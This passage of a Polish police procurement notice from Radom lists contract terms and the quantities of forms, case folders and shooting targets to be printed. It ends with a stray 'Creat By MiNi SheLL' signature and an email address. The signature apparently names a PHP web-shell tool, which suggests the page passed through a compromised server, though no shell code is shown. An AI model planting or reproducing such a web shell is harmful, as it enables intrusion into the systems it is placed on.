2) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1,
zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem przy zachowaniu terminu wystawienia wymaganego dla tego rodzaju dokumentu. 
3) W przypadku udzielenia pełnomocnictwa - oryginał pełnomocnictwa lub kopia poświadczona przez notariusza. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane jest określenie pełnomocnika do ich reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oryginał pełnomocnictwa
lub notarialnie potwierdzona kopia, z którego musi wynikać zakres umocowania dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy załączyć do oferty. 4) Formularz ofertowy, 5) Wykaz - cennik asortymentowo- ilościowy - zgodny z załącznikiem nr 1 i 2 do siwz, stanowiący integralną część formularza ofertowego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy częściowej - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.)	Zamawiający może w ramach wykonania umowy zamówić mniejszą od przewidywanej ilość asortymentu, nie mniej jednak niż 80% przewidywanej ilości towaru. Odpowiedniemu zmniejszeniu ulegnie wówczas wynagrodzenie, a Wykonawcy z tego tytułu nie będą przysługiwać wobec Zamawiającego żadne roszczenia.
2.)	Zamawiający zastrzega sobie prawo do zmian ilości i opisu technicznego asortymentów wyszczególnionych w załącznikach nr 1, który stanowi integralną część umowy, a wynikających ze zmian przepisów dotyczących  druków,  formularzy  resortowych, tarcz i obwolut.
3.)	W przypadku konieczności dokonania zakupu druków w terminie wcześniejszym
 niż wskazany § 3 ust. 1 wzoru umowy strony przewidują możliwość zmiany dat początkowych i końcowych obowiązywania umowy przy zachowaniu 24 miesięcy jej  obowiązywania.
4.)	Strony dopuszczają zmianę wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany:
a.	stawki podatku od towarów i usług,
b.	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c.	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mazowiecka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji zs. w Radomiu
ul. 11 Listopada 37/59, 26-600 Radom
Sekcja Zamówień Publicznych KWP zs. w Radomiu
pokój 801 (8- piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2016 godzina 10:30, miejsce: Komenda Wojewódzka Policji zs. w Radomiu
ul. 11 Listopada 37/59, 26-600 Radom
Sekcja Zamówień Publicznych KWP zs. w Radomiu
pokój 801 (8- piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - druki resortowe, formularze, tarcze i obwoluty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Księga kasowa 20.
2.Wykaz dodatkowych należności pieniężnych 8.
3.Umowa zlecenie	58.
4.Protokół przyjęcia ustnej skargi o przestępstwie ściganym z oskarżenia prywatnego	24.
5.Postanowienie o wszczęciu dochodzenia	30.
6.Postanowienie o odmowie wszczęcia śledztwa	20.
7.Postanowienie o odmowie wszczęcia dochodzenia nowy wzór 20.
8.Protokół oględzin miejsca, rzeczy, osoby 1680.
9.Protokół zewnętrznych oględzin zwłok na miejscu ich znalezienia	780.
10.Protokół oględzin pojazdu wielośladowego	560.
11.	Protokół oględzin pojazdu jednośladowego	360.
12.	Szkic miejsca wypadku drogowego	80.
13.	Postanowienie o podjęciu na nowo dochodzenia umorzonego i wpisanego do rejestru przestępstw	14.
14.	Sprawozdanie z przeprowadzonych badań na zawartość alkoholu	56.
15.	Wezwanie	920.
16.	Potwierdzenie odbioru	3400.
17.	Protokół przesłuchania świadka biegłego	6000.
18.	Przedłużacz do Ms-14 i Ms-26	460.
19.	Protokół przeszukania	12400.
20.	Przedłużacz do Ms-17 i Ms-18 i Ms-19	240.
21.	Spis i opis rzeczy c.d. Ms-17, Ms-18, Ms-19	500.
22.	Protokół przeszukania osoby, jej odzieży i podręcznych przedmiotów	5600.
23.	Protokół zatrzymania rzeczy	7000.
24.	Protokół tymczasowego zajęcia mienia ruchomego	40.
25.	Protokół oddania rzeczy na przechowanie	90.
26.	Wykaz rzeczy oddanych  na przechowanie	90.
27.	Wniosek o zatwierdzenie przeszukania/zatrzymania rzeczy	10.
28.	Deklaracja na założenie depozytu	8.
29.	Postanowienie o przedstawieniu zarzutów, uzupełnienie zarzutów i zmianie zarzutów	8.
30.	Protokół przesłuchania podejrzanego	700.
31.	Protokół okazania osoby/wizerunku/ rzeczy	620.
32.	Protokół konfrontacji	1600.
33.	Zawiadomienie o wszczęciu dochodzenia/śledztwa	30.
34.	Postanowienie o umorzeniu dochodzenia i wpisu sprawy do rejestru przestępstw	16.
35.	Protokół użycia testera narkotykowego	40.
36.	Zapytanie o udzieleniu informacji o osobie	56.
37.	Wniosek  o zastosowanie, zmianę, uchylenie lub przedłużenie środka zapobiegawczego	10.
38.	Nakaz przyjęcia przekazania zwolnienia osoby zatrzymanej	500.
39.	Nakaz wydania osoby zatrzymanej	380.
40.	Postanowienie o dopuszczeniu dowodu z opinii biegłego	8.
41.	Zawiadomienie stron o terminie dokonywania czynności procesowych	24.
42.	Postanowienie o oddaleniu wniosku dowodowego	8.
43.	Protokół zaznajomienia podejrzanego z materiałami śledztwa/dochodzenia	20.
44.	Postanowienie o zamknięciu śledztwa/dochodzenia	16.
45.	Akt oskarżenia	140.
46.	Załącznik do aktu oskarżenia	4.
47.	Postanowienie o umorzeniu śledztwa	56.
48.	Postanowienie o umorzeniu dochodzenia	56.
49.	Karta przeglądowa	720.
50.	Karta nadzoru	200.
51.	Protokół oględzin miejsca wypadku drogowego	400.
52.	Załącznik do Ms-60	42.
53.	Protokół przyjęcia ustnego zawiadomienia o przestępstwie i przesłuchania w charakterze świadka	1640.
54.	Pouczenie  o  uprawnieniach i obowiązkach pokrzywdzonego w postępowaniu karnym	2000.
55.	Pouczenie o uprawnieniach i obowiązkach podejrzanego w postępowaniu karnym	320.
56.	Protokół zatrzymania osoby	560.
57.	Metryczka śladu/przedmiotu	19600.
58.	Protokół przyjęcia wniosku o ściganie	30.
59.	Protokół eksperymentu procesowego	1020.
60.	Postanowienie o zawieszeniu śledztwa/dochodzenia	8.
61.	Zawiadomienie podejrzanego i obrońcy o terminie końcowego zaznajomienia z materiałami	10.
62.	Uzasadnienie postanowienia o przedstawieniu zarzutów/ o uzupełnieniu zarzutów/ o  zmianie zarzutów	6.
63.	Protokół pobrania materiału dowodowego/porównawczego	24.
64.	Protokół przesłuchania nieletniego sprawcy czynu karalnego	2600.
65.	Pouczenie nieletniego sprawcy czynu karalnego o uprawnieniach i obowiązkach	250.
66.	Protokół pobrania wymazu ze śluzówki policzków	22.
67.	Protokół pobrania materiału biologicznego za zwłok ludzkich	6.
68.	Wniosek o rozpoznanie sprawy w postępowaniu przyspieszonym	6.
69.	Dodatkowe uprawnienia pokrzywdzonego w związku z prowadzeniem postępowania przyspieszonego	8.
70.	Dodatkowe uprawnienia i obowiązki podejrzanego oskarżonego w związku z prowadzeniem postępowania przyspieszonego	8.
71.	Notatka o udzieleniu podejrzanemu informacji o możliwości korzystania w postępowaniu przyspieszonym przed sądem rejonowym z pomocy obrońcy spośród wyznaczonych do pełnienia dyżuru przez właściwą miejscową okręgową radę adwokacką oraz z listy innych adwokatów tego okręgu	8.
72.	Karta sprawdzeń mienia	56.
73.	Pouczenie o uprawnieniach zatrzymanego  w postępowaniu karnym	230.
74.	Pouczenie o uprawnieniach tymczasowo aresztowanego w postępowaniu karnym	56.
75.	Pouczenie o uprawnieniach zatrzymanego na podstawie europejskiego nakazu aresztowania	26.
76.	Pouczenie o uprawnieniach i obowiązkach świadka w postępowaniu karnym	230.
77.	Załącznik adresowy - nowy wzór	56.
78.	Postanowienie w przedmiocie kosztów postępowania przygotowawczego	56.
79.	Wniosek o przyznanie należności/Zestawienie należności	56.
80.	Potwierdzenie złożenia zawiadomienia	56.
81.	Karta ekspertyzy broni	8.
82.	Karta ewidencji broni	180.
83.	Zlecenie na wykonanie prac fotograficznych	56.
84.	Karta daktyloskopijna odcisków linii papilarnych palców	1700.
85.	Karta daktyloskopijna odcisków linii papilarnych palców sporządzona w przypadku pobierania odcisków na podstawie art.. 192A § 1 kpk	1000.
86.	Karta chejroskopijna odcisków linii papilarnych dłoni	800.
87.	Karta daktyloskopijna cudzoziemca	200.
88.	Karta daktyloskopijna cudzoziemca (nowy wzór)	200.
89.	Karta rejestracyjna próbki biologicznej	200.
90.	Zarządzenie o wprowadzeniu do bazy danych DNA informacji o wynikach analizy kwasu dezoksyrybonukleionowego	200.
91.	Karta rejestracyjna profilu DNA	240.
92.	Karta rejestracji w Krajowym Zbiorze Wkładek Złamanych	56.
93.	Karta daktyloskopijna odcisków linii papilarnych dłoni sporządzona w przypadku pobierania odcisków na podstawie art.. 192A 1§ kpk	800.
94.	Karta albumowa	8.
95.	Zawiadomienie o zaginięciu osoby	1040.
96.	Zawiadomienie o zaginięciu osoby kat. III	60.
97.	Rejestr osób poszukiwanych	56.
98.	Książka służby w patrolach, obchodach i na posterunkach (nowy wzór)	380.
99.	Książka wydarzeń	140.
100.	Rejestr interwencji Policji	20.
101.	Protokół konfrontacji	700.
102.	Dzielnicowy odpowiedzialny za rejon służbowy załącznik do Mp-8	8.
103.	Karta kontroli i nadzoru załącznik do Mp-8	20.
104.	Książka kontroli spraw przydzielonych dzielnicowemu	160.
105.	Rejestr dozoru	30.
106.	Notatnik służbowy	44000.
107.	Notatnik służbowy dla policjantów ruchu drogowego	3000.
108.	Książka ewidencji osób umieszczonych w pomieszczeniu przeznaczonym dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia	88.
109.	Kwit depozytowy	400.
110.	Książka wizyt lekarskich	12.
111.	Książka służby konwojowej	60.
112.	Obliczenie należności za konwojowanie	120.
113.	Protokół przyjęcia zawiadomienia o wykroczeniu, żądania ścigania sprawcy wykroczenia	13000.
114.	Wezwanie	520.
115.	Protokół przesłuchania świadka wykroczenia	3000.
116.	Protokół przesłuchania osoby, co do której istniej uzasadniona podstawa do sporządzenia przeciwko niej wniosku o ukaranie	1000.
117.	Protokół oględzin	100.
118.	Protokół przeszukania w sprawie o wykroczenia	1000.
119.	Protokół przeszukania osoby	2000.
120.	Wniosek o zatwierdzenie przeszukania	20.
121.	Rejestr spraw o wykroczenia	56.
122.	Książka przebiegu służby w pomieszczeniu przeznaczonym dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia	56.
123.	Protokół doprowadzenia osoby w celu wytrzeźwienia	300.
124.	Protokół kontroli osobistej, przeglądania zawartości bagażu, sprawdzaniu ładunku	20.
125.	Pouczenie o uprawnieniach osoby zatrzymanej - wersja polska	100.
126.	Poświadczenie bezpieczeństwa	2500.
127.	Karta przejęcia osoby	8.
128.	Pouczenie pokrzywdzonego o uprawnieniach i obowiązkach w sprawach o wykroczenia	300.
129.	Protokół zatrzymania nieletniego	56.
130.	Niebieska karta	7000.
131.	Niebieska karta	7000.
132.	Zawiadomienie pokrzywdzonego o przesłaniu wniosku o ukaranie do sądu	58.
133.	Zawiadomienie pokrzywdzonego o niewniesieniu wniosku o ukaranie do sądu	58.
134.	Pismo do osoby zawiadamiającej, nie będącej osoba pokrzywdzoną, informujące o nie wniesieniu o ukaranie do sądu	58.
135.	Wniosek o odstąpienie do kierowania wniosku o ukaranie do sądu	58.
136.	Protokół zatrzymania osoby	170.
137.	Karta nadzoru nad czynnościami wyjaśniającymi w sprawie o wykroczenie	46.
138.	Pokwitowanie zatrzymania paszportu lub innego dokumentu uprawniającego do przekroczenia granicy	12.
139.	Informacje do pokrzywdzonego/zawiadamiająca o zastosowaniu postępowania mandatowego wobec sprawcy wykroczenia	32.
140.	Karta informacyjna o uzasadnionym podejrzeniu popełnienia wykroczenia przez osobę korzystającą z immunitetu zakrajowego	24.
141.	Rejestr wokand	20.
142.	Książka doprowadzeń	58.
143.	Karta zapoznania z regulaminem pobytu w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia	58.
144.	Zaświadczenie lekarskie (dotyczy zatrzymanych osób nietrzeźwych)	58.
145.	Zaświadczenie lekarskie	58.
146.	Karta zapoznania z regulaminem pobytu w pokoju przejściowym	8.
147.	Kwit depozytowy	120.
148.	Kwit depozytowy	120.
149.	Karta zapoznania z regulaminem pobytu w tymczasowym pomieszczeniu przejściowym	8.
150.	Pouczenie o prawach i obowiązkach osoby, co której istnieje uzasadniona podstawa do sporządzenia przeciwko niej wniosku o ukaranie	168.
151.	Kwestionariusz szacowania ryzyka. Część A - przemoc wobec osób dorosłych	58.
152.	Kwestionariusz szacowania ryzyka. Część B - przemoc wobec dzieci	58.
153.	Pouczenie osoby doprowadzonej w celu wytrzeźwienia	180.
154.	Pouczenie o uprawnieniach zatrzymanego w sprawie o wykroczenia	180.
155.	Protokół okazania osoby, wizerunku, rzeczy	336.
156.	Postanowienie o skierowaniu sprawy do postępowania mediacyjnego	400.
157.	Pouczenie o uprawnieniach osoby zatrzymanej na podstawie art. 15 ust. 1 pkt 2a ustawy z dnia 6 kwietnia 1990 r. o Policji	30.
158.	Pouczenie o uprawnieniach osoby zatrzymanej na podstawie art. 15 ust. 1 pkt 3 ustawy z dnia 6 kwietnia 1990 r. o Policji	30.
159.	Zarządzenie w przedmiocie udostępniania materiałów  czynności wyjaśniających	30.
160.	Postanowienie o oddaleniu wniosku dowodowego	30.
161.	Postanowienie w przedmiocie zwrotu kosztów związanych z osobistym stawiennictwem na wezwanie organu w związku z prowadzonymi czynnościami wyjaśniającymi w sprawie o wykroczenie	30.
162.	Karta zdarzenia drogowego	500.
163.	Karta rejestracyjna wykroczeń i przestępstw w ruchu drogowym	46000.
164.	Pismo przewodnie do przesłanego prawa jazdy	60.
165.	Wniosek o sprawdzenie kwalifikacji/cofnięcie uprawnień	56.
166.	Protokół użycia urządzenia kontrolno-pomiarowego	800.
167.	Rejestr badań przeprowadzonych urządzeniami elektronicznymi do badania stanu trzeźwości	300.
168.	Wniosek o ukaranie	62.
169.	Załącznik do wniosku o ukaranie Mrd-13	28.
170.	Wniosek o ukaranie na współsprawców	4.
171.	Protokół kontroli	400.
172.	Załącznik do protokołu kontroli Mrd-18	180.
173.	Decyzja o nałożeniu kary pieniężnej (dotyczy usunięcia pojazdu)	56.
174.	Dyspozycja usunięcia pojazdu	180.
175.	Protokół badania śliny/krwi/ moczu	20.
176.	Sprawozdanie z kontroli drogowej zawierające wykaz kontrolny	112.
177.	Powiadomienie	168.
178.	Dyspozycja usunięcia pojazdu bez tablic rejestracyjnych	80.
179.	Notatka urzędowa o wypadku/kolizji drogowej/	300.
180.	Załącznik do notatki urzędowej ze zdarzenia drogowego	150.
181.	Wniosek o przydział lokalu mieszkalnego	8.
182.	Wniosek w sprawie przyznania pomocy finansowej	34.
183.	Karta mieszkaniowa funkcjonariusza	20.
184.	Oświadczenie mieszkaniowe za remont lokalu	120.
185.	Oświadczenie mieszkaniowe za brak lokalu	160.
186.	Wniosek o przydział kwatery tymczasowej	1.
187.	Książka konserwacji sprzętu	30.
188.	Dziennik telegramów wychodzących	58.
189.	Dziennik telegramów wchodzących	68.
190.	Dziennik ewidencji telegramów	120.
191.	Dziennik przebiegu służby	88.
192.	Rozdzielnik przedmiotów mundurowych	200.
193.	Karta mundurowa	1400.
194.	Kartoteka magazynowa	800.
195.	Dowód wydania-przyjęcia A5	200.
196.	Protokół przyjęcia A4	10.
197.	Protokół przyjęcia A5	70.
198.	Karta materiałowa ilościowo-wartościowa	1200.
199.	Książka ewidencji sprzętu w użytkowaniu	200.
200.	Książka ewidencji sprzętu materiału w jednostce użytkującej	200.
201.	Księga magazynowa sprzętu	20.
202.	Rejestr dowodów materiałowych	40.
203.	Rejestr kart materiałowych	40.
204.	Karta materiałowo-ilościowa	570.
205.	Dowód wydania - przyjęcia A4	20.
206.	Księga środków trwałych	2.
207.	Książka ewidencji wypadków i kolizji dotyczących służbowego sprzętu transportowego	5.
208.	Książka dyspozytora	200.
209.	Książka kontroli pracy sprzętu transportowego	1000.
210.	Wkładka do Gt-11	1000.
211.	Zezwolenie na kierowanie pojazdem uprzywilejowanym lub pojazdem przewożącym wartości pieniężne ( różowy druk)	1000.
212.	Zamówienie na przydzielenie sprzętu transportowego	400.
213.	Dowód techniczny sprzętu transportowego Policji	5.
214.	Zestawienie prac wykonanych w punkcie obsługi technicznej w miesiącu, roku	48.
215.	Arkusz weryfikacji części zapasów	80.
216.	Karta pracy/pojazdu/	2000.
217.	Książka ewidencji materiałów pędnych i smarów	30.
218.	Książka ewidencji sprzętu uzbrojenia	30.
219.	Książka ewidencji sprzętu uzbrojenia magazynu podręcznego	10.
220.	Książka ewidencji sprzętu uzbrojenia wg numerów	38.
221.	Książka wydania broni -nowy wzór	150.
222.	Książka depozytu broni - nowy wzór	150.
223.	Książka nadzoru nad bronią palną - nowy wzór	150.
224.	Wykaz rozdzielczo-zdawczy amunicji	60.
225.	Dowód wpłaty KP	140.
226.	Dowód wypłaty	4.
227.	Raport kasowy	56.
228.	Wniosek o zaliczkę	56.
229.	Rozliczenie zaliczki	28.
230.	Księga druków ścisłego zarachowania	30.
231.	Karta kontowa materiałowa ilościowo-wartościowa	28.
232.	Bankowe polecenie przelewu /1+3 kopie/	10.
233.	Karta zastępcza	710.
234.	Karta zapoznania z aktami osobowymi (nowy wzór)	650.
235.	Karta przebiegu służby	270.
236.	Pocztowa książka nadawcza	90.
237.	Książka doręczeń przesyłek miejscowych	200.
238.	Pokwitowanie przyjęcia tymczasowo aresztowanych, skazanych lub ukaranych	60.
239.	Książka kontroli sanitarnej	5.
240.	Dziennik podawczy	720.
241.	Dziennik korespondencyjny	1500.
242.	Dziennik przepisów	110.
243.	Książka ewidencji przepustek jednorazowych	10.
244.	Przepustka jednorazowa	10.
245.	Książka przebiegu służby w pomieszczeniu przeznaczonym dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia	56.
246.	Książka ewidencji kluczy	120.
247.	Legitymacja pracownika	90.
248.	Ewidencja wyjść służbowych	120.
249.	Zaświadczenie o zarobkach i zatrudnieniu	56.
250.	Polecenie wyjazdu	300.
251.	Rejestr skarg i wniosków	28.
252.	Ewidencja mandatów karnych gotówkowych	28.
253.	Książka obiektu budowlanego	8.
254.	Dziennik budowy	20.
255.	Książka psa służbowego Policji	28.
256.	Dziennik pracy psa służbowego Policji	28.
257.	Ewidencja otrzymanych kart Mrd-5	20.
258.	Rejestr druków Mrd-5 sporządzonych na kierujących zamieszkałych na terenie jednostki ...	100.
259.	Rejestr druków Mrd-5 sporządzonych na kierujących zamieszkałych poza terenem jednostki ...	10.
260.	Rejestr podręczny druków Mrd-5/1 w komisariatach	10.
261.	Rejestr podręczny druków Mrd-5/1 w komórce właściwej w sprawach postępowań o przestępstwa i wykroczenia	10.
262.	Rejestr zatrzymanych dowodów rejestracyjnych	76.
263.	Zatrzymanie dowodu rejestracyjnego	200.
264.	Pokwitowanie zwrotu dowodu	30.
265.	Rejestr zatrzymanych uprawnień do kierowania pojazdami	28.
266.	Zatrzymanie prawa jazdy	200.
267.	Rejestr wydanych notatników i wkładek do kontroli służby	28.
268.	Rejestr stałej organizacji ruchu	10.
269.	Rejestr czasowej organizacji ruchu	5.
270.	Rejestr wniosków o sprawdzenie kwalifikacji kierujących pojazdami lub o cofnięcie uprawnień	4.
271.	Rejestr meldunków informacyjnych	4.
272.	Rejestr pracy urządzenia  wideorejestrator/fotorapid	40.
273.	Rejestr dokumentów związanych z kontrolą transportu drogowego	6.
274.	Zestawienie liczbowe nałożonych mandatów karnych i pouczeń	28.
275.	Dziennik szkolenia	100.
276.	Dzienniczek doskonalenia zawodowego policjanta	50.
277.	Arkusz wyszkolenia strzeleckiego policjanta(załącznik nr 3 do instrukcji w sprawie organizacji strzelań)	250.
278.	Dziennik ewidencyjny	300.
279.	Dziennik korespondencji jawnej	30.
280.	Rejestr wydanych przedmiotów	28.
281.	Rejestr dzienników ewidencji  i teczek	90.
282.	Rejestr teczek dokumentów jawnych	90.
283.	Ankieta bezpieczeństwa osobowego	1500.
284.	Wykaz przesyłek nadanych A4	180.
285.	Wykaz przesyłek nadanych A5	300.
286.	Wykaz przesyłek wydanych A4	200.
287.	Wykaz przesyłek wydanych A5	240.
288.	Roczna karta ewidencji czasu pracy	400.
289.	Książka pracy kurierów poczty specjalnej	10.
290.	Potwierdzenie odbioru w postępowaniu administracyjnym	900.
291.	Książeczka szczepień	650.
292.	Książka jednostki	9.
293.	Książka dyżurnego	20.
294.	książka zapoznania z regulaminem pobytu osób umieszczonych w pomieszczeniach dla osób zatrzymanych lub doprowadzonych do wytrzeźwienia	28.
295.	Karta dopłat do wczasów	80.
296.	Faktura VAT	4.
297.	Wezwanie do zapłaty	4.
298.	Karta wynagrodzenia	1000.
299.	Karta uposażenia funkcjonariusza	3000.
300.	Rejestr wniosków o zastosowanie obserwacji	20.
301.	Meldunek informacyjny	40.
302.	Karta ewidencyjna przedmiotu	10.
303.	Rejestr pobytu na strzelnicy	28.
304.	Ewidencja wydanego sprzętu dla użytkowników -Wydział Konwojowy KWP zs w Radomiu	24.
305.	Rejestr wypadków pozostających w związku z pełnieniem służby	28.
306.	Rejestr dowodów rzeczowych Laboratorium Kryminalistycznego KWP zs w Radomiu	28.
307.	Dziennik Stanowiska Komputerowego - (ODN) nowy wzór	150.
308.	Tarcza sportowa nr 1/ekran średnica 200mm	5000.
309.	Tarcza strzelecka, figura nr 3 z pierścieniami/góra	1500.
310.	Tarcza strzelecka, figura nr 3 z pierścieniami/dół	1500.
311.	Tarcza strzelecka nr 4 popiersie	1950.
312.	Tarcza ćwiczebna -  nr 5/góra	120.
313.	Tarcza ćwiczebna -  nr 5/dół	120.
314.	Tarcza - figura przestępcy	4500.
315.	Tarcza - figura terrorysty	5000.
316.	Tarcza pistoletowa do strzelań dynamicznych	800.
317.	Tarcza - kobieta z bronią	1200.
318.	Tarcza - kobieta jasna z bronią	200.
319.	Tarcza neutralna - kobieta jasna z kubeczkiem	200.
320.	Tarcza neutralna - kobieta jasna z latarką	100.
321.	Tarcza neutralna - kobieta jasna z pilotem TV	100.
322.	Tarcza neutralna - kobieta jasna z nożem	160.
323.	Tarcza mężczyzna z pistoletem	160.
324.	Tarcza neutralna - mężczyzna z kubeczkiem	100.
325.	Tarcza neutralna - mężczyzna z latarką	100.
326.	Tarcza neutralna - mężczyzna z pilotem TV	100.
327.	Tarcza neutralna - mężczyzna z nożem	100.
328.	Tarcza mężczyzna w kominiarce z bronią	400.
329.	Tarcza kobieta ciemna z bronią	800.
330.	Tarcza neutralna - kobieta ciemna z kubeczkiem	200
331.	Tarcza neutralna - kobieta ciemna z latarką	200
332.	Tarcza neutralna - kobieta ciemna z pilotem TV	120
333.	Tarcza neutralna - kobieta ciemna z nożem	120
334.	Tarcza mężczyzna z PM	120
335.	Tarcza - terrorysta z zakładniczką	500
336.	Tarcza - głowa terrorysty	200
337.	Tarcza - prostokątna punktowa	200
338.	Akta dochodzenia-śledztwa	100000
339.	Akta dochodzenia-śledztwa- koloru zielonego	50000
340.	Makieta do materiałów poglądowych z dokonanych czynności	4000
341.	Makieta do materiałów poglądowych ekspertyz kryminalistycznych	1000
342.	Dokumentacja fotograficzna	3500
343.	Materiał poglądowy	1000
344.	Teczka poszukiwania/identyfikacji	4000
345.	Teczka rejonu dzielnicowego (okładka koloru niebieskiego)	3
346.	Akta osobowe - funkcjonariusza	500
347.	Akta postępowania sprawdzającego (kolor niebieski) poufne	28
348.	Akta postepowania sprawdzającego (kolor czerwony) tajne	28
349.	Akta postepowania sprawdzającego (kolor pomarańczowy) ściśle tajne	40
350.	Akta osobowe pracownika policji	150
351.	Teczka okolicznościowa	3500
352.	Teczka osób informujących	1000
353.	Teczka pracy informatora	1000
354.	Teczka osobowa informatorów	1000
355.	Teczka rozpracowania operacyjnego	1500
356.	Teczka operacyjnego rozpoznania	2500
357.	Teczka koordynacji	500
358.	Teczka nadzoru	600
359.	Teczka osobowa współpracownika	400
360.	Teczka pracy współpracownika	400
361.	Rejestr teczek operacyjnych	100
362.	Rejestr teczek pracy informatora	60
363.	Rejestr teczek współpracowników	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy częściowej - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - druki ścisłego zarachowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Nakaz przeszukania/zatrzymania rzeczy  (seria , numeracja, mikrodruk)	129.
2.Legitymacja posiadacza broni  -książeczka (seria , numeracja, zabezpieczenia specjalne)	2500.
3.Zaświadczenie uprawniające do nabycia broni	13000.
4.Karta rejestracyjna broni - książeczka (seria, numeracja, zabezp. specjalne)	75.
5.Europejska karta broni palnej	100.
6.Pokwitowanie (seria numeracja, mikrodruk)	2635.
7.Zezwolenie na odbiór pojazdu z parkingu strzeżonego	234..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy częściowej - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com